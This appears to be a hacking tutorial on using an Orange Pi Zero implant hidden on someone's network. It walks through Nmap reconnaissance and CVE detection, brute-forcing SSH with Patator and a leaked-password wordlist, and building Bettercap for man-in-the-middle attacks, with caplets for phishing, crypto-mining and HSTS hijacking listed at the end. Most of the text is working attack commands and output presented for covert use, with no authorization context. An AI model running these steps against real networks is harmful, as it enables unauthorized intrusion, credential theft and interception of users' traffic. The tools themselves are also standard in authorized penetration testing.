With a tiny computer planted on a network, a hacker can watch which sites users visit, attack services on the LAN, and log into the Wi-Fi router's administrative gateway to change sensitive settings. Once the implant has been connected to the router, these attacks can be carried out from anywhere. The Orange Pi Zero and the Armbian operating system must first be set up for remote access and network-based attacks before proceeding. The operating system is not weaponized out of the box, so be sure to review my previous article on setting everything up first. The attacks below can be performed with a Raspberry Pi as well, but the installation commands were only tested on the Orange Pi Zero.

Previously: How to Set Up Network Implants with a Cheap SBC (tokyoneon, Null Byte)

This article focuses on performing several network-based attacks after the Orange Pi Zero has been planted on the target router. The tools and attacks featured here are far from a complete picture of the damage an attacker can inflict on a network, but they are a good start at showing how dangerous a network implant is in the wrong hands.

1. Perform Network Recon & CVE Detection with Nmap

Nmap is one of the essential network-mapping tools. Begin by installing it on the Orange Pi Zero with the following apt-get command.

root@orangepizero:~# apt-get update && apt-get install nmap

Next, install some useful NSE scripts such as nmap-vulners and vulscan, as shown in my previous article on detecting CVEs with Nmap scripts. When those are in place, identify the IP address, netmask, and route the target router handed to the Orange Pi Zero.

root@orangepizero:~# ip addr
3: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc mq state UP group default qlen 1000
    link/ether XX:XX:XX:XX:XX:XX brd ff:ff:ff:ff:ff:ff
    inet 192.168.8.138/24 brd 192.168.8.255 scope global dynamic eth0
       valid_lft 86056sec preferred_lft 86056sec
    inet6 xxxx::xxxx:xxxx:xxxx:xxxx/64 scope link
       valid_lft forever preferred_lft forever

The Orange Pi Zero was given 192.168.8.138/24, so the router is presumably at 192.168.8.1; confirm it with the ip route command, whose default route names the gateway. Then perform a ping scan (-sn) of the entire /24 to discover live hosts. Because the implant sits on the same Ethernet segment as its targets, Nmap performs this scan with ARP requests, which is why it can also report each host's MAC address and vendor.

root@orangepizero:~# nmap -sn 192.168.8.1/24
Starting Nmap 7.40 ( https://nmap.org ) at 2019-04-15 01:17 UTC
Nmap scan report for 192.168.8.1
Host is up (0.00038s latency).
MAC Address: XX:XX:XX:XX:XX:XX (Mediabridge Products)
Nmap scan report for 192.168.8.2
Host is up (0.00049s latency).
MAC Address: XX:XX:XX:XX:XX:XX (Mediabridge Products)
Nmap scan report for 192.168.8.179
Host is up (-0.088s latency).
MAC Address: XX:XX:XX:XX:XX:XX (Sony)
Nmap scan report for 192.168.8.183
Host is up (-0.10s latency).
MAC Address: XX:XX:XX:XX:XX:XX (Unknown)
Nmap scan report for 192.168.8.138
Host is up.
Nmap done: 256 IP addresses (5 hosts up) scanned in 4.45 seconds

If, for example, the unidentified host at 192.168.8.183 (the one Nmap lists with an unknown vendor) looks interesting, we can probe it further.
root@orangepizero:~# nmap -sV -T4 --script nmap-vulners -F -A 192.168.8.183
Starting Nmap 7.40 ( https://nmap.org ) at 2019-04-15 01:19 UTC
Nmap scan report for 192.168.8.183
Host is up (0.00080s latency).
Not shown: 99 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| vulners:
|   cpe:/a:openbsd:openssh:7.6p1:
|       CVE-2018-15919  5.0     https://vulners.com/cve/CVE-2018-15919
|_      CVE-2018-15473  5.0     https://vulners.com/cve/CVE-2018-15473
MAC Address: 48:1C:52:9F:A6:71 (Unknown)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.6
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Here -sV probes service versions, -F limits the scan to the 100 most common ports, -A adds OS detection and traceroute, and --script nmap-vulners looks the detected versions up in the Vulners database. The script reports two CVEs for this SSH server. Keep in mind that the match is made on the version banner (OpenSSH 7.6p1), and distributions such as Ubuntu backport security fixes without changing that upstream version number, so a hit here means "possibly affected", not "confirmed vulnerable". The banner identifies the host as an Ubuntu machine, and automatic updates have probably patched the serious issues; verify each reported CVE against the distribution's package changelog, or test it directly, before relying on it. We could further probe the service or other hosts on the network with more advanced Nmap scans and scripts. For more on Nmap, check out the following articles:

Top 5 Intrusive Nmap Scripts Hackers & Pentesters Should Know

How to Automate Brute-Force Attacks for Nmap Scans

Using the Nmap Scripting Engine (NSE) for Reconnaissance
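Scanning from an implant usually means scanning unattended and reading the results later. Nmap's -oX option writes the same report as XML, and the script below, added here as an example (it is not part of Nmap, of the nmap-vulners script, or of the original article), reads that XML and lists each live host's open ports, service versions and the CVE ids vulners attached to them. The embedded XML is a constructed sample in the shape of the scan above, not a real report; the nmap_triage.py file name and the scan.xml argument in main() are assumptions.

```python
"""Triage an Nmap XML report from the implant: live hosts, open ports, service
versions and the CVE ids the vulners NSE script attached to each port.

Added example for this article; it is not part of Nmap, nmap-vulners or the
original post. SAMPLE_XML is a constructed report shaped like the scan above,
not real output, and the file name used in main() is an assumption.
"""
import sys
import xml.etree.ElementTree as ET

# Constructed sample: one host up with SSH open (two vulners CVE hits) and a
# closed port, plus one host that is down. Produce real input with: nmap ... -oX scan.xml
SAMPLE_XML = """<?xml version="1.0"?>
<nmaprun scanner="nmap" args="nmap -sV -F --script nmap-vulners -oX scan.xml 192.168.8.183">
  <host>
    <status state="up"/>
    <address addr="192.168.8.183" addrtype="ipv4"/>
    <address addr="48:1C:52:9F:A6:71" addrtype="mac"/>
    <ports>
      <port protocol="tcp" portid="22">
        <state state="open"/>
        <service name="ssh" product="OpenSSH" version="7.6p1 Ubuntu 4ubuntu0.3"/>
        <script id="vulners" output="see tables">
          <table key="cpe:/a:openbsd:openssh:7.6p1">
            <table>
              <elem key="id">CVE-2018-15919</elem>
              <elem key="cvss">5.0</elem>
              <elem key="type">cve</elem>
              <elem key="is_exploit">false</elem>
            </table>
            <table>
              <elem key="id">CVE-2018-15473</elem>
              <elem key="cvss">5.0</elem>
              <elem key="type">cve</elem>
              <elem key="is_exploit">false</elem>
            </table>
          </table>
        </script>
      </port>
      <port protocol="tcp" portid="80">
        <state state="closed"/>
        <service name="http"/>
      </port>
    </ports>
  </host>
  <host>
    <status state="down"/>
    <address addr="192.168.8.200" addrtype="ipv4"/>
  </host>
</nmaprun>
"""


def _vulners_cves(port):
    """Collect (cve_id, cvss) pairs from a port's vulners <script> element.
    vulners nests one <table> per CPE, each holding one <table> per finding
    whose <elem key=...> children carry id, cvss, type and is_exploit."""
    cves = []
    for script in port.findall("script"):
        if script.get("id") != "vulners":
            continue
        for finding in script.iter("table"):
            fields = {e.get("key"): (e.text or "").strip() for e in finding.findall("elem")}
            if fields.get("type") == "cve" and fields.get("id"):
                cves.append((fields["id"], float(fields.get("cvss") or 0.0)))
    # Highest CVSS first; the sort is stable, so equal scores keep report order.
    return sorted(cves, key=lambda c: -c[1])


def parse_nmap_xml(xml_text):
    """Return one dict per host reported up, each with ip, mac and its open ports."""
    hosts = []
    for host in ET.fromstring(xml_text).iter("host"):
        status = host.find("status")
        if status is None or status.get("state") != "up":
            continue
        addrs = {a.get("addrtype"): a.get("addr") for a in host.findall("address")}
        ports = []
        for port in host.iter("port"):
            state = port.find("state")
            if state is None or state.get("state") != "open":
                continue
            svc = port.find("service")
            version = ""
            if svc is not None:
                version = " ".join(v for v in (svc.get("product"), svc.get("version")) if v)
            ports.append({
                "port": int(port.get("portid")),
                "proto": port.get("protocol"),
                "service": svc.get("name") if svc is not None else None,
                "version": version,
                "cves": _vulners_cves(port),
            })
        hosts.append({"ip": addrs.get("ipv4"), "mac": addrs.get("mac"), "ports": ports})
    return hosts


def report(hosts):
    """Render the parsed hosts as text lines; ports with CVE hits are flagged
    for manual verification, since vulners matches on the version banner only."""
    lines = []
    for h in hosts:
        lines.append(f"{h['ip']} ({h['mac'] or 'mac unknown'})")
        for p in h["ports"]:
            flag = " <- verify: " + ", ".join(c[0] for c in p["cves"]) if p["cves"] else ""
            lines.append(f"  {p['port']}/{p['proto']} {p['service']} {p['version']}{flag}")
    return lines


if __name__ == "__main__":
    # Assumed usage: python3 nmap_triage.py scan.xml (falls back to the sample).
    text = open(sys.argv[1]).read() if len(sys.argv) > 1 else SAMPLE_XML
    print("\n".join(report(parse_nmap_xml(text))))
```

Append -oX scan.xml to the scan command and run the script on the file; hosts that were down and ports that were closed are dropped, and every port carrying vulners hits is marked "verify" rather than treated as vulnerable.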

2. Perform Brute-Force Attacks with Patator

Like Hydra and Medusa, Patator is a flexible, full-featured, command-line brute-forcing tool, and it has quickly become one of my favorite hacking instruments. In my previous article, How to Break into Router Gateways with Patator, it was used to run a dictionary attack against router gateways, which suits a network-based attack like this Orange Pi Zero hack well. This time, I'll show Patator's SSH brute-forcing module.

First, install the dependencies the Patator Python script requires. There are quite a few packages, so this can take up to ten minutes. Prefixing the command with screen (install it first if necessary) is recommended: if the SSH connection to the implant drops, screen keeps the installation running, and you can reattach to it when the connection is re-established.

root@orangepizero:~# screen apt-get install libcurl4-openssl-dev python3-dev libssl-dev ldap-utils default-libmysqlclient-dev ike-scan unzip default-jdk libsqlite3-dev libsqlcipher-dev python-setuptools python-pip libpq-dev python-dev libffi6 libffi-dev pkg-config autoconf python-dev cmake
Reading package lists... Done
Building dependency tree
Reading state information... Done
The following NEW packages will be installed:
  adwaita-icon-theme ca-certificates-java default-jdk default-jdk-headless default-jre default-jre-headless fontconfig fontconfig-config fonts-dejavu-core gtk-update-icon-cache hicolor-icon-theme ike-scan java-common ldap-utils libasyncns0 libatk-bridge2.0-0 libatk-wrapper-java libatk-wrapper-java-jni libatk1.0-0 libatk1.0-data libatspi2.0-0 libavahi-client3 libavahi-common-data libavahi-common3 libcairo-gobject2 libcairo2 libcolord2 libcroco3 libcups2 libcurl4-openssl-dev libdatrie1 libdrm2 libegl1-mesa libepoxy0 libexpat1-dev libflac8 libfontconfig1 libfontenc1 libfreetype6 libgbm1 libgdk-pixbuf2.0-0 libgdk-pixbuf2.0-common libgif7 libgl1-mesa-glx libglapi-mesa libgraphite2-3 libgtk-3-0 libgtk-3-common libgtk2.0-0 libgtk2.0-common libharfbuzz0b libice6 libjbig0 libjpeg62-turbo libjson-glib-1.0-0 libjson-glib-1.0-common liblcms2-2 libnspr4 libnss3 libogg0 libpango-1.0-0 libpangocairo-1.0-0 libpangoft2-1.0-0 libpixman-1-0 libpulse0 libpython3-dev libpython3.5 libpython3.5-dev librest-0.7-0 librsvg2-2 librsvg2-common libsm6 libsndfile1 libsoup-gnome2.4-1 libsqlcipher-dev libsqlcipher0 libsqlite3-dev libthai-data libthai0 libtiff5 libvorbis0a libvorbisenc2 libwayland-client0 libwayland-cursor0 libwayland-egl1-mesa libwayland-server0 libx11-6 libx11-data libx11-xcb1 libxau6 libxaw7 libxcb-dri2-0 libxcb-dri3-0 libxcb-glx0 libxcb-present0 libxcb-render0 libxcb-shape0 libxcb-shm0 libxcb-sync1 libxcb-xfixes0 libxcb1 libxcomposite1 libxcursor1 libxdamage1 libxdmcp6 libxext6 libxfixes3 libxft2 libxi6 libxinerama1 libxkbcommon0 libxmu6 libxmuu1 libxpm4 libxrandr2 libxrender1 libxshmfence1 libxt6 libxtst6 libxv1 libxxf86dga1 libxxf86vm1 openjdk-8-jdk openjdk-8-jdk-headless openjdk-8-jre openjdk-8-jre-headless python3-dev python3.5-dev shared-mime-info x11-common x11-utils
0 upgraded, 131 newly installed, 0 to remove and 0 not upgraded.
Need to get 112 MB of archives.
After this operation, 312 MB of additional disk space will be used.
Do you want to continue? [Y/n]

Upgrade the setuptools and wheel packages using the following pip command. Note that pip here is the Python 2.7 pip provided by the python-pip package, as the dist-packages path in the output shows.

root@orangepizero:~# pip install --upgrade setuptools wheel
Collecting setuptools
  Downloading https://files.pythonhosted.org/packages/c8/b0/cc6b7ba28d5fb790cf0d5946df849233e32b8872b6baca10c9e002ff5b41/setuptools-41.0.0-py2.py3-none-any.whl (575kB)
    100% |████████████████████████████████| 583kB 181kB/s
Installing collected packages: setuptools
  Found existing installation: setuptools 33.1.1
    Not uninstalling setuptools at /usr/lib/python2.7/dist-packages, outside environment /usr
Successfully installed setuptools-41.0.0

Clone the Patator GitHub repository with git.

root@orangepizero:~# git clone https://github.com/lanjelot/patator/ /opt/patator
Cloning into '/opt/patator'...
remote: Enumerating objects: 457, done.
remote: Total 457 (delta 0), reused 0 (delta 0), pack-reused 457
Receiving objects: 100% (457/457), 325.11 KiB | 149.00 KiB/s, done.
Resolving deltas: 100% (157/157), done.

Change (cd) into the new /opt/patator/ directory.

root@orangepizero:~# cd /opt/patator/

Then use pip again to install the remaining requirements. This can take up to 20 minutes. The pynacl and cryptography packages took especially long in my tests, because there are no prebuilt wheels for this ARM board and they are compiled from source, so be patient.
root@orangepizero:/opt/patator# pip install -r requirements.txt
  Downloading https://files.pythonhosted.org/packages/cf/ae/94e70d49044ccc234bfdba20114fa947d7ba6eb68a2e452d89b920e62227/paramiko-2.4.2-py2.py3-none-any.whl (193kB)
    100% |████████████████████████████████| 194kB 216kB/s
Collecting pycurl (from -r requirements.txt (line 2))
  Downloading https://files.pythonhosted.org/packages/e8/e4/0dbb8735407189f00b33d84122b9be52c790c7c3b25286826f4e1bdb7bde/pycurl-7.43.0.2.tar.gz (214kB)
    100% |████████████████████████████████| 215kB 172kB/s
Collecting ajpy (from -r requirements.txt (line 3))
  Downloading https://files.pythonhosted.org/packages/12/dd/e641d8c0b3b14eed50122a3c090ff9150bd0988fd0790d4819cd8083e83d/ajpy-0.0.4.tar.gz
Collecting pyopenssl (from -r requirements.txt (line 5))
  Downloading https://files.pythonhosted.org/packages/01/c8/ceb170d81bd3941cbeb9940fc6cc2ef2ca4288d0ca8929ea4db5905d904d/pyOpenSSL-19.0.0-py2.py3-none-any.whl (53kB)
    100% |████████████████████████████████| 61kB 66kB/s
Collecting cx_Oracle (from -r requirements.txt (line 6))
  Downloading https://files.pythonhosted.org/packages/4b/aa/99e49d10e56ff0263a8927f4ddb7e8cdd4671019041773f61b3259416043/cx_Oracle-7.1.2.tar.gz (289kB)
    100% |████████████████████████████████| 296kB 177kB/s
Collecting mysqlclient (from -r requirements.txt (line 7))
  Downloading https://files.pythonhosted.org/packages/f4/f1/3bb6f64ca7a429729413e6556b7ba5976df06019a5245a43d36032f1061e/mysqlclient-1.4.2.post1.tar.gz (85kB)
    100% |████████████████████████████████| 92kB 98kB/s
Collecting psycopg2-binary (from -r requirements.txt (line 8))
  Downloading https://files.pythonhosted.org/packages/dc/93/bb5655730913b88f9068c6b596177d1df83be0d476671199e17b06ea8436/psycopg2-binary-2.8.2.tar.gz (369kB)
    100% |████████████████████████████████| 378kB 169kB/s
Collecting pycrypto (from -r requirements.txt (line 9))
  Downloading https://files.pythonhosted.org/packages/60/db/645aa9af249f059cc3a368b118de33889219e0362141e75d4eaf6f80f163/pycrypto-2.6.1.tar.gz (446kB)
    100% |████████████████████████████████| 450kB 114kB/s
...
  Stored in directory: /root/.cache/pip/wheels/43/61/c8/0a4464601ce180d26e0a8dfdfa88c824e419dcc65bd43bda6e
  Running setup.py bdist_wheel for bcrypt ... done
  Stored in directory: /root/.cache/pip/wheels/6c/f0/60/8a8ebee44d14d3d6696f1e78960500777cb5b579caf33c1fe3
  Running setup.py bdist_wheel for pycryptodomex ... done
  Stored in directory: /root/.cache/pip/wheels/83/37/75/85a95885e1e48d22cc6c964680e7938a19ca7c80eb814b2ff0
  Running setup.py bdist_wheel for cffi ... done
  Stored in directory: /root/.cache/pip/wheels/bb/f8/22/e3e8d9dd87e0cc6df8201325bd0ae815e701d1ef2b95571cf2
Successfully built pycurl ajpy cx-Oracle mysqlclient psycopg2-binary pycrypto IPy pynacl cryptography bcrypt pycryptodomex cffi
Installing collected packages: cffi, pynacl, asn1crypto, enum34, ipaddress, cryptography, bcrypt, pyasn1, paramiko, pycurl, ajpy, pyopenssl, cx-Oracle, mysqlclient, psycopg2-binary, pycrypto, dnspython, IPy, pycryptodomex, ply, pysmi, pysnmp
Successfully installed IPy-1.0 ajpy-0.0.4 asn1crypto-0.24.0 bcrypt-3.1.6 cffi-1.12.2 cryptography-2.6.1 cx-Oracle-7.1.2 dnspython-1.16.0 enum34-1.1.6 ipaddress-1.0.22 mysqlclient-1.4.2.post1 paramiko-2.4.2 ply-3.11 psycopg2-binary-2.8.1 pyasn1-0.4.5 pycrypto-2.6.1 pycryptodomex-3.8.1 pycurl-7.43.0.2 pynacl-1.3.0 pyopenssl-19.0.0 pysmi-0.3.3 pysnmp-4.4.9

When that's done, verify Patator is working and view the available modules with the --help option.
root@orangepizero:/opt/patator# ./patator.py --help
Patator v0.7 (https://github.com/lanjelot/patator)
Usage: patator.py module --help

Available modules:
  + ftp_login : Brute-force FTP
  + ssh_login : Brute-force SSH
  + telnet_login : Brute-force Telnet
  + smtp_login : Brute-force SMTP
  + smtp_vrfy : Enumerate valid users using SMTP VRFY
  + smtp_rcpt : Enumerate valid users using SMTP RCPT TO
  + finger_lookup : Enumerate valid users using Finger
  + http_fuzz : Brute-force HTTP
  + rdp_gateway : Brute-force RDP Gateway
  + ajp_fuzz : Brute-force AJP
  + pop_login : Brute-force POP3
  + pop_passd : Brute-force poppassd (http://netwinsite.com/poppassd/)
  + imap_login : Brute-force IMAP4
  + ldap_login : Brute-force LDAP
  + smb_login : Brute-force SMB
  + smb_lookupsid : Brute-force SMB SID-lookup
  + rlogin_login : Brute-force rlogin
  + vmauthd_login : Brute-force VMware Authentication Daemon
  + mssql_login : Brute-force MSSQL
  + oracle_login : Brute-force Oracle
  + mysql_login : Brute-force MySQL
  + mysql_query : Brute-force MySQL queries
  + rdp_login : Brute-force RDP (NLA)
  + pgsql_login : Brute-force PostgreSQL
  + vnc_login : Brute-force VNC
  + dns_forward : Forward DNS lookup
  + dns_reverse : Reverse DNS lookup
  + snmp_login : Brute-force SNMP v1/2/3
  + ike_enum : Enumerate IKE transforms
  + unzip_pass : Brute-force the password of encrypted ZIP files
  + keystore_pass : Brute-force the password of Java keystore files
  + sqlcipher_pass : Brute-force the password of SQLCipher-encrypted databases
  + umbraco_crack : Crack Umbraco HMAC-SHA1 password hashes
  + tcp_fuzz : Fuzz TCP services
  + dummy_test : Testing module

The very same SSH service discovered previously can now be brute-forced using Patator's ssh_login module. To view the available ssh_login options, use the command below.

root@orangepizero:/opt/patator# ./patator.py ssh_login
Patator v0.7 (https://github.com/lanjelot/patator)
Usage: ssh_login <module-options ...> [global-options ...]
Examples:
  ssh_login host=10.0.0.1 user=root password=FILE0 0=passwords.txt -x ignore:mesg='Authentication failed.'

Module options:
  host          : target host
  port          : target port [22]
  user          : usernames to test
  password      : passwords to test
  auth_type     : type of password authentication to use [password|keyboard-interactive|auto]
  keyfile       : file with RSA, DSA or ECDSA private key to test
  persistent    : use persistent connections [1|0]

For a more complete list of options and arguments, use the ssh_login and --help options together.

root@orangepizero:/opt/patator# ./patator.py ssh_login --help

For demonstration purposes, I'm using a short wordlist compiled from leaked password databases. It can be downloaded onto the Orange Pi Zero with the following wget command.

root@orangepizero:/opt/patator# wget 'https://git.io/fhhvc' -O /tmp/simple_wordlist.txt
--2019-04-15 02:19:09--  https://git.io/fhhvc
Resolving git.io (git.io)... 52.203.53.176
Connecting to git.io (git.io)|52.203.53.176|:443... connected.
HTTP request sent, awaiting response... 302 Found
Location: https://raw.githubusercontent.com/tokyoneon/1wordlist/master/1wordlist2rulethem%40ll.txt [following]
--2019-04-15 02:19:13--  https://raw.githubusercontent.com/tokyoneon/1wordlist/master/1wordlist2rulethem%40ll.txt
Resolving raw.githubusercontent.com (raw.githubusercontent.com)... 199.232.8.133
Connecting to raw.githubusercontent.com (raw.githubusercontent.com)|199.232.8.133|:443... connected.
HTTP request sent, awaiting response... 200 OK
Length: 25585 (25K) [text/plain]
Saving to: ‘/tmp/simple_wordlist.txt’

/tmp/simple_wordlist.txt   100%[==============================>]  24.99K  59.7KB/s    in 0.4s

2019-04-15 02:19:22 (59.7 KB/s) - ‘/tmp/simple_wordlist.txt’ saved [25585/25585]

Finally, brute-force the SSH service using the following Patator command.
root@orangepizero:/opt/patator# ./patator.py ssh_login host=192.168.8.183 port=22 user=root password=FILE0 0=/tmp/simple_wordlist.txt -t 1
INFO - Starting Patator v0.7 (https://github.com/lanjelot/patator) at 2019-04-14 07:25 UTC
INFO -
INFO - code  size    time | candidate                          |   num | mesg
INFO - -----------------------------------------------------------------------------
INFO - 1     22     2.005 | 123456                             |     1 | Authentication failed.
INFO - 1     22     2.277 | Abcdef123                          |     2 | Authentication failed.
INFO - 1     22     1.344 | a123456                            |     3 | Authentication failed.
INFO - 1     22     1.814 | little123                          |     4 | Authentication failed.
INFO - 1     22     2.081 | nanda334                           |     5 | Authentication failed.
INFO - 1     22     2.023 | N97nokia                           |     6 | Authentication failed.
INFO - 1     22     1.676 | password                           |     7 | Authentication failed.
INFO - 1     22     2.249 | Pawerjon123                        |     8 | Authentication failed.
INFO - 1     22     2.180 | 421uiopy258                        |     9 | Authentication failed.
INFO - 1     22     2.116 | MYworklist123                      |    10 | Authentication failed.
INFO - 1     22     1.879 | 12345678                           |    11 | Authentication failed.
INFO - 1     22     2.015 | qwerty                             |    12 | Authentication failed.
INFO - 1     22     1.772 | nks230kjs82                        |    13 | Authentication failed.
INFO - 1     22     2.212 | trustno1                           |    14 | Authentication failed.
INFO - 1     22     1.631 | zxcvbnm                            |    15 | Authentication failed.
INFO - 1     22     2.116 | N97nokiamini                       |    16 | Authentication failed.
INFO - 1     22     2.050 | letmein                            |    17 | Authentication failed.
INFO - 1     22     1.814 | 123456789                          |    18 | Authentication failed.
INFO - 1     22     2.107 | myplex                             |    19 | Authentication failed.
INFO - 1     22     0.042 | tokyoneon                          |    20 | Authentication failed.
INFO - 1     22     2.375 | gm718422@                          |    21 | Authentication failed.
INFO - 1     22     1.613 | churu123A                          |    22 | Authentication failed.
INFO - 1     22     1.914 | abc123                             |    23 | Authentication failed.
INFO - 1     22     1.820 | plex123                            |    24 | Authentication failed.
INFO - 1     22     1.778 | any123456                          |    25 | Authentication failed.
INFO - 1     22     2.048 | Lwf1681688                         |    26 | Authentication failed.
INFO - Hits/Done/Skip/Fail/Size: 26/26/0/0/26, Avg: 0 r/s, Time: 0h 0m 51s

Patator tries every password in the wordlist (FILE0, bound to 0=) as the given user= against host= on the specified port=. Without a filter, every response is listed and counted, which is why the summary reports 26 "hits" for 26 failed attempts; add -x ignore:mesg='Authentication failed.' (as in the module's own usage example) to print only the candidates that actually logged in. To avoid flooding the SSH service with password attempts, use -t to set the number of concurrent threads. It is ten by default; -t 1 keeps the attack to one attempt at a time, which with this server's roughly two-second response per attempt works out to 26 passwords in 51 seconds. Increase or decrease it as the situation warrants.

3. Perform Man-in-the-Middle Attacks with Bettercap

Bettercap is written in Go, and it needs a newer Go toolchain than the one shipped in the Debian repositories, so Go has to be installed first. Start by installing the libraries Bettercap builds against.

root@orangepizero:~# apt-get install libpcap-dev libusb-1.0-0-dev libnetfilter-queue-dev
Reading package lists... Done
Building dependency tree
Reading state information... Done
build-essential is already the newest version (12.3).
golang is already the newest version (2:1.7~5).
The following additional packages will be installed:
  libnetfilter-queue1 libnfnetlink-dev libpcap0.8-dev pkg-config
Recommended packages:
  libusb-1.0-doc
The following NEW packages will be installed:
  libnetfilter-queue-dev libnetfilter-queue1 libnfnetlink-dev libpcap-dev libpcap0.8-dev libusb-1.0-0-dev pkg-config
0 upgraded, 7 newly installed, 0 to remove and 0 not upgraded.
Need to get 405 kB of archives.
After this operation, 1,142 kB of additional disk space will be used.
Do you want to continue? [Y/n]

If you aren't already there, change into the /root/ directory for the following commands. Using /tmp isn't advised: when it is mounted as a RAM-backed tmpfs, as it commonly is on Armbian, the 100 MB download and the Go build tree eat into memory the Orange Pi Zero can't spare, and the board may run out of memory during the build.

root@orangepizero:~# cd /root/

Then download the tar.gz archive containing the prebuilt Go release for ARM (the armv6l build runs fine on the Orange Pi Zero's ARMv7 CPU).

root@orangepizero:~# wget 'https://dl.google.com/go/go1.12.7.linux-armv6l.tar.gz'
--2019-04-13 19:52:48--  https://dl.google.com/go/go1.12.7.linux-armv6l.tar.gz
Resolving dl.google.com (dl.google.com)... 172.217.194.93, 172.217.194.136, 172.217.194.190, ...
Connecting to dl.google.com (dl.google.com)|172.217.194.93|:443... connected.
HTTP request sent, awaiting response...
200 OK
Length: 106218905 (101M) [application/octet-stream]
Saving to: ‘go1.12.7.linux-armv6l.tar.gz’

go1.12.7.linux-armv6l.tar.gz   100%[==============================>] 101.30M  3.28MB/s    in 34s

2019-04-13 19:53:22 (3.02 MB/s) - ‘go1.12.7.linux-armv6l.tar.gz’ saved [106218905/106218905]

Next, unpack the archive into /usr/local.

root@orangepizero:~# tar -C /usr/local -xzf go1.*.tar.gz

Add the Go binaries to the $PATH so the following commands can find them. The export only lasts for the current shell session; add the same line to ~/.profile to make it permanent.

root@orangepizero:~# export PATH=$PATH:/usr/local/go/bin

Before cloning the Bettercap repository, the swap space available to the Orange Pi Zero needs to be expanded. Swap is a region of disk the operating system uses as overflow memory: when the hardware RAM (512 MB on the Orange Pi Zero) is exhausted, pages are moved to swap instead of the process being killed, and building Bettercap needs more than the board has. To create a new swap area, use dd to write a 2 GB (2048 × 1 MB) file of zeros from /dev/zero. This takes about three minutes on the SD card.

root@orangepizero:~# dd if=/dev/zero of=/root/swapfile bs=1M count=2048
2048+0 records in
2048+0 records out
2147483648 bytes (2.1 GB, 2.0 GiB) copied, 195.927 s, 11.0 MB/s

Then format it with mkswap. The "insecure permissions" warning means the file is world-readable, so any local user could read whatever memory gets swapped out to it. On a throwaway implant that is of no concern, but on any other system set the file to mode 0600, as the warning suggests, before continuing.

root@orangepizero:~# mkswap /root/swapfile
mkswap: /root/swapfile: insecure permissions 0644, 0600 suggested.
Setting up swapspace version 1, size = 2 GiB (2147479552 bytes)
no label, UUID=e629a001-7a20-4346-8479-4a04fae459af

Enable the new swap area with swapon. (It is not re-enabled after a reboot unless it is added to /etc/fstab; for a one-off build that doesn't matter.)

root@orangepizero:~# swapon /root/swapfile
swapon: /root/swapfile: insecure permissions 0644, 0600 suggested.

The new swap space can be verified with the free command.
root@orangepizero:~# free -ht
              total        used        free      shared  buff/cache   available
Mem:           493M         84M        9.0M        604K        399M        397M
Swap:          2.2G         19M        2.2G
Total:         2.7G        104M        2.2G

Notice that Swap: is now over 2 GB. Now, back to the Bettercap install. Fetch the Bettercap source with go get, which clones it into the Go workspace ($HOME/go by default with this Go version).

root@orangepizero:~# go get github.com/bettercap/bettercap

Then define $GOPATH explicitly with export so the next commands resolve the workspace path.

root@orangepizero:~# export GOPATH=/root/go/

Change into the newly created Bettercap directory.

root@orangepizero:~# cd $GOPATH/src/github.com/bettercap/bettercap

Run make build. This is the step that needs the extra swap; no output will occur while it runs.

root@orangepizero:~/go/src/github.com/bettercap/bettercap# make build

Finally, install Bettercap with make install.

root@orangepizero:~/go/src/github.com/bettercap/bettercap# make install

To start using Bettercap, use the following command with the -iface option to specify the interface facing the target router. Otherwise, Bettercap might attack devices connected to the Orange Pi Zero's own Wi-Fi hotspot, if that was set up previously. Screen is recommended here too: it keeps Bettercap running if you disconnect from the Orange Pi Zero and reattach later.

root@orangepizero:~/go/src/github.com/bettercap/bettercap# screen bettercap -iface eth0
bettercap v2.23 (built for linux arm with go1.12.4) [type 'help' for a list of commands]

192.168.8.0/24 > 192.168.8.138  »

For starters, use the help command to view the available commands and the running modules.

10.#.#.#/24 > 10.#.#.##  » help

           help MODULE : List available commands or show module specific help if no module name is provided.
                active : Show information about active modules.
                  quit : Close the session and exit.
         sleep SECONDS : Sleep for the given amount of seconds.
              get NAME : Get the value of variable NAME, use * alone for all, or NAME* as a wildcard.
        set NAME VALUE : Set the VALUE of variable NAME.
  read VARIABLE PROMPT : Show a PROMPT to ask the user for input that will be saved inside VARIABLE.
                 clear : Clear the screen.
        include CAPLET : Load and run this caplet in the current session.
             ! COMMAND : Execute a shell command and print its output.
        alias MAC NAME : Assign an alias to a given endpoint given its MAC address.

Modules

      any.proxy > not running
       api.rest > not running
      arp.spoof > not running
      ble.recon > not running
        caplets > not running
    dhcp6.spoof > not running
      dns.spoof > not running
  events.stream > running
            gps > not running
            hid > not running
     http.proxy > not running
    http.server > not running
    https.proxy > not running
   https.server > not running
    mac.changer > not running
   mysql.server > not running
      net.probe > not running
      net.recon > not running
      net.sniff > not running
   packet.proxy > not running
       syn.scan > not running
      tcp.proxy > not running
         ticker > not running
             ui > not running
         update > not running
           wifi > not running
            wol > not running

192.168.8.0/24 > 192.168.8.138  »

Then fetch the latest caplets from the Bettercap repository with the caplets.update command. Caplets are scripts that automate sequences of Bettercap commands and settings.

10.#.#.#/24 > 10.#.#.##  » caplets.update
[21:18:57] [sys.log] [inf] caplets downloading caplets from https://github.com/bettercap/caplets/archive/master.zip ...
[21:19:03] [sys.log] [inf] caplets installing caplets to /usr/local/share/bettercap/caplets ...

Use caplets.show to view the installed caplets and their location on the filesystem. You are encouraged to review the caplet files for brief descriptions of what each one does.
10.#.#.#/24 > 10.#.#.##  » caplets.show

Name                                  Path                                                                        Size
ap                                    /usr/local/share/bettercap/caplets/ap.cap                                   307 B
crypto-miner/crypto-miner             /usr/local/share/bettercap/caplets/crypto-miner/crypto-miner.cap            666 B
download-autopwn/download-autopwn     /usr/local/share/bettercap/caplets/download-autopwn/download-autopwn.cap    2.6 kB
fb-phish/fb-phish                     /usr/local/share/bettercap/caplets/fb-phish/fb-phish.cap                    140 B
gitspoof/gitspoof                     /usr/local/share/bettercap/caplets/gitspoof/gitspoof.cap                    216 B
gps                                   /usr/local/share/bettercap/caplets/gps.cap                                  109 B
hstshijack/hstshijack                 /usr/local/share/bettercap/caplets/hstshijack/hstshijack.cap                799 B
